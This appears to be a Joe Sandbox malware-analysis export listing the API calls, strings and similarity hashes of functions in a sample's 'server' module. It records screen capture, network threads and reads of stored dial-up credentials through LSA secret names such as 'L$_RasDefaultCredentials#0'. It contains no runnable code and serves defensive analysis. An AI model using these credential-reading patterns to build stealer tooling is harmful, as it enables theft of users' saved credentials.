                                                                                              • Instruction ID: e6a01bf69eca8877366d52572196cd1e750499aaefb071a1afc55558adb3dbc2
                                                                                              • Opcode Fuzzy Hash: fb4cd3e966eb61606cad13a92799049cb3e66f4be6874b68efb03894c3cec11b
                                                                                              • Instruction Fuzzy Hash: F7F0C273A052793BF12066A65C89FAB3B5DDB92BB0F100226F614AA2C0D9946C1186B6
                                                                                              APIs
                                                                                                • Part of subcall function 10003740: RtlEnterCriticalSection.NTDLL(10002690), ref: 10003748
                                                                                                • Part of subcall function 10003740: RtlLeaveCriticalSection.NTDLL(10002690), ref: 10003761
                                                                                              • _ftol.MSVCRT ref: 10003E6F
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,1000175F,?,00000118,?,?,?,?,?,?), ref: 10003EAE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$??2@??3@EnterLeave_ftol
                                                                                              • String ID:
                                                                                              • API String ID: 2245774403-0
                                                                                              • Opcode ID: d43c15c9dc710f9c4bc954111707159e1ff32841bea0643a9bd1dc03e9c16b30
                                                                                              • Instruction ID: 4abf8248d303709f5cc18c5d73ebea0275a85850dc47ce3d48f28f5182355441
                                                                                              • Opcode Fuzzy Hash: d43c15c9dc710f9c4bc954111707159e1ff32841bea0643a9bd1dc03e9c16b30
                                                                                              • Instruction Fuzzy Hash: C34196797047045BE705EF249C42A7FB39DEBC4794F00492DFA0597286EE34B90D87A2
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,0000005C,00000000,00000000,00000060,00000000,1000FD4A,?,?,00000001), ref: 1001026B
                                                                                              • GetDC.USER32(00000000), ref: 100102C6
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 100102D3
                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 100102E6
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 100102EF
                                                                                              • DeleteObject.GDI32(00000000), ref: 100102F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@BitmapBitsCompatibleCreateDeleteObjectRelease
                                                                                              • String ID:
                                                                                              • API String ID: 1095915628-0
                                                                                              • Opcode ID: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
                                                                                              • Instruction ID: 78a216903de2e8302ceba6b2a70ee99028da7e5e411dfa4f1e5e99106784fed4
                                                                                              • Opcode Fuzzy Hash: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
                                                                                              • Instruction Fuzzy Hash: 9F31F5712057418FE324CF29CC84B5AFBE6FF85304F188A6DE5958F2A1E7B1A549CB50
                                                                                              APIs
                                                                                                • Part of subcall function 10006E70: ??2@YAPAXI@Z.MSVCRT ref: 10006E9B
                                                                                                • Part of subcall function 10006E70: ??2@YAPAXI@Z.MSVCRT(?), ref: 10006EAA
                                                                                              • lstrlen.KERNEL32(?), ref: 10011E0B
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 10011E28
                                                                                              • lstrlen.KERNEL32(?), ref: 10011E68
                                                                                              • Sleep.KERNEL32(00000001), ref: 10011EAD
                                                                                              • LocalSize.KERNEL32(00000000), ref: 10011EB4
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 10011EC6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$??2@lstrlen$AllocFreeSizeSleep
                                                                                              • String ID:
                                                                                              • API String ID: 3002304083-0
                                                                                              • Opcode ID: 2f0adfffeb334e18917d6daae7ad8ba864390cce98521ba1c7aec059076dbe97
                                                                                              • Instruction ID: 77e4d1ca07d08acbcddfd6096d60104819a82ef412391c00f2a2c794c29ddd91
                                                                                              • Opcode Fuzzy Hash: 2f0adfffeb334e18917d6daae7ad8ba864390cce98521ba1c7aec059076dbe97
                                                                                              • Instruction Fuzzy Hash: D131AE756083428FD314CF58C884B5ABBE5FB89750F500A1CF99697350DB74ED45CB92
                                                                                              APIs
                                                                                              • inet_addr.WS2_32(?), ref: 100050A8
                                                                                              • gethostbyname.WS2_32(?), ref: 100050B4
                                                                                              • inet_ntoa.WS2_32(?), ref: 100050DE
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000514C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000514F
                                                                                              • CreateThread.KERNEL32(00000000,00000000,10004FF0,00000000,00000000,00000000), ref: 1000517B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 772126777-0
                                                                                              • Opcode ID: 033d0ddaf9bd5aa833e53fe520b2a97e6b5e9bfbca6cc5c265d62fdae6fdf5d4
                                                                                              • Instruction ID: cfe0648d242c00018cb7dca233d2f890e554d2c8424b1bc925b856dd57eae328
                                                                                              • Opcode Fuzzy Hash: 033d0ddaf9bd5aa833e53fe520b2a97e6b5e9bfbca6cc5c265d62fdae6fdf5d4
                                                                                              • Instruction Fuzzy Hash: 3C21E2327403155BE328DB389C85B6B77E2FB84760F65462DFA52A72D0CEF4AC048658
                                                                                              APIs
                                                                                              • inet_addr.WS2_32(?), ref: 10004228
                                                                                              • gethostbyname.WS2_32(?), ref: 10004234
                                                                                              • inet_ntoa.WS2_32(?), ref: 1000425E
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 100042CC
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 100042CF
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 100042F8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 772126777-0
                                                                                              • Opcode ID: 9601f318078ff8162673fcfb5c04afe03e9b2cf260f9edf1260973535f350d36
                                                                                              • Instruction ID: bd1dde3535a19e8c7e55d02713a8ca2fab0bdaef4a4b0867c8bad2423498b820
                                                                                              • Opcode Fuzzy Hash: 9601f318078ff8162673fcfb5c04afe03e9b2cf260f9edf1260973535f350d36
                                                                                              • Instruction Fuzzy Hash: 2821C7727403155BE328DB349C45B2A76E2FBC4760F65461DFA56A72D0CEB4EC048618
                                                                                              APIs
                                                                                              • inet_addr.WS2_32(00000002), ref: 10004C88
                                                                                              • gethostbyname.WS2_32(00000002), ref: 10004C94
                                                                                              • inet_ntoa.WS2_32(?), ref: 10004CBE
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10004D2C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10004D2F
                                                                                              • CreateThread.KERNEL32(00000000,00000000,10004BC0,00000000,00000000,00000000), ref: 10004D58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 772126777-0
                                                                                              • Opcode ID: b0f98d7cc70be7034cfa90e989c04db07f7eb8121ae3485462dc02540b3a068e
                                                                                              • Instruction ID: 85862d7f0f71f0c49f886932ab5ba76a0be675f07226ac381a57201f8fc0328c
                                                                                              • Opcode Fuzzy Hash: b0f98d7cc70be7034cfa90e989c04db07f7eb8121ae3485462dc02540b3a068e
                                                                                              • Instruction Fuzzy Hash: D021C7727407155BE328DB349C85B1A76E2FBC4760F65462EFA56A72D0CFB4EC048618
                                                                                              APIs
                                                                                              • inet_addr.WS2_32(?), ref: 10004F08
                                                                                              • gethostbyname.WS2_32(?), ref: 10004F14
                                                                                              • inet_ntoa.WS2_32(?), ref: 10004F3E
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10004FAC
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10004FAF
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004DC0,00000000,00000000,00000000), ref: 10004FD8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 772126777-0
                                                                                              • Opcode ID: 6963211a604a5b15fbd72f10532032c652b07b21011d2a556fd3fd40579641c8
                                                                                              • Instruction ID: 074d757184539b64c9d175ae26cd748b0207da95c97c991421b52f25c974b03f
                                                                                              • Opcode Fuzzy Hash: 6963211a604a5b15fbd72f10532032c652b07b21011d2a556fd3fd40579641c8
                                                                                              • Instruction Fuzzy Hash: FB2106723043155BE328DB389C85B2A76E2FBC4760F66462DFA52A72D0CEF4EC04C618
                                                                                              APIs
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002C48
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002C51
                                                                                              • ??2@YAPAXI@Z.MSVCRT(000003E8), ref: 10002C78
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,000003E8), ref: 10002C82
                                                                                              • ??2@YAPAXI@Z.MSVCRT(000003E8,00000020,000003E8), ref: 10002C8D
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,000003E8,00000020,000003E8), ref: 10002C97
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$CreateEvent
                                                                                              • String ID:
                                                                                              • API String ID: 747899935-0
                                                                                              • Opcode ID: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
                                                                                              • Instruction ID: a50fb07bf8c1123475231c099c298c4878f8277ca68681ab5e841357f648eb1a
                                                                                              • Opcode Fuzzy Hash: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
                                                                                              • Instruction Fuzzy Hash: 04215EB0900B449FD324CF6AC884557FBF8FF48348750892EE1898BB11E7B6E845CB54
                                                                                              APIs
                                                                                              • GetVersionExA.KERNEL32 ref: 00402DF3
                                                                                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00402E28
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402E88
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                              • API String ID: 1385375860-4131005785
                                                                                              • Opcode ID: d32aba8153413fb79f22db8816aa953c0611f4f7a567bdac4acef65ff769318a
                                                                                              • Instruction ID: 6320224d0c2d352184b776b6ceda42ea704a1604693acbb24f6c53f50b478bf9
                                                                                              • Opcode Fuzzy Hash: d32aba8153413fb79f22db8816aa953c0611f4f7a567bdac4acef65ff769318a
                                                                                              • Instruction Fuzzy Hash: D231577188025869EB30D630EE49BDB37689B02708F2400FBD245F52C2E3BD8E998B59
                                                                                              APIs
                                                                                              • wsprintfA.USER32 ref: 1000743C
                                                                                                • Part of subcall function 100071B0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 100071D2
                                                                                              • LsaFreeMemory.ADVAPI32(?), ref: 1000746A
                                                                                              • LsaFreeMemory.ADVAPI32(?), ref: 10007494
                                                                                                • Part of subcall function 10007240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,00000000), ref: 10007279
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeMemory$ByteCharMultiOpenPolicyWidewsprintf
                                                                                              • String ID: L$_RasDefaultCredentials#0$RasDialParams!%s#0
                                                                                              • API String ID: 3354934605-1591505386
                                                                                              • Opcode ID: 069507318d07fdd3591eeedcd7f3e9026eb01116497707671abf5df464a27a46
                                                                                              • Instruction ID: 47a45ef77663ef483bee348490e5c8beabf349d216bd41400619d6b49833efe8
                                                                                              • Opcode Fuzzy Hash: 069507318d07fdd3591eeedcd7f3e9026eb01116497707671abf5df464a27a46
                                                                                              • Instruction Fuzzy Hash: 662180799083119BE318DF68C89096BB3E9FBC8740F00892DF98993340D678E988CBD1
                                                                                              APIs
                                                                                              • CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000003,00000080,00000000,?,00000001), ref: 1000904C
                                                                                              • SetFilePointer.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 1000905D
                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000001), ref: 10009077
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000907E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                                              • String ID: p
                                                                                              • API String ID: 3604237281-2181537457
                                                                                              • Opcode ID: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
                                                                                              • Instruction ID: e36ba735aa5967a60d40e1ff6ea43c2d8375e51feaec2a2a75f8885a5be44a60
                                                                                              • Opcode Fuzzy Hash: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
                                                                                              • Instruction Fuzzy Hash: CE11CE71244312ABE300DF54CC85F6BB7E9EFD9714F040A1DF6449B2D0E7B4A9098BA2
                                                                                              APIs
                                                                                                • Part of subcall function 1000D440: RtlEnterCriticalSection.NTDLL(?), ref: 1000D448
                                                                                                • Part of subcall function 1000D440: RtlLeaveCriticalSection.NTDLL(?), ref: 1000D462
                                                                                              • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D4C6
                                                                                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D4D4
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 1000D4E6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
                                                                                              • String ID: closesocket$ws2_32.dll
                                                                                              • API String ID: 2819327233-181964208
                                                                                              • Opcode ID: fa73705bdcf92b9203618bcc10ca7097f6834da9e5e7f852be07f6072b9ccad8
                                                                                              • Instruction ID: 00068fa8fe7e3d5c1250a0fa65b0051220447006da9e6c79012b2ada544fa8ed
                                                                                              • Opcode Fuzzy Hash: fa73705bdcf92b9203618bcc10ca7097f6834da9e5e7f852be07f6072b9ccad8
                                                                                              • Instruction Fuzzy Hash: 4FF0EC36004B21ABE210EF389C85D9F7798EFC9762F004719FB4096240CB74E905C7B6
                                                                                              APIs
                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00403AD6
                                                                                              • GetFileType.KERNEL32(00000800), ref: 00403B7C
                                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 00403BD5
                                                                                              • GetFileType.KERNEL32(00000000), ref: 00403BE3
                                                                                              • SetHandleCount.KERNEL32 ref: 00403C1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleType$CountInfoStartup
                                                                                              • String ID:
                                                                                              • API String ID: 1710529072-0
                                                                                              • Opcode ID: 77ec292723b799dc4d9b58e1807d0efb76a35c9d561ca0d753548a00766590b6
                                                                                              • Instruction ID: 31f96ad768a7b34329c178f01d9d2c09c0530c6e7952056691baff74689cfdd4
                                                                                              • Opcode Fuzzy Hash: 77ec292723b799dc4d9b58e1807d0efb76a35c9d561ca0d753548a00766590b6
                                                                                              • Instruction Fuzzy Hash: 805114316046404BD7208F2CCC447667FB8FB1172AF55463AE8A6EB2E2D77CE949C719
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F283
                                                                                              • CloseHandle.KERNEL32(?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F28D
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2B1
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2E2
                                                                                                • Part of subcall function 1000FB90: LoadCursorA.USER32(00000000,00000000), ref: 1000FC53
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F309
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
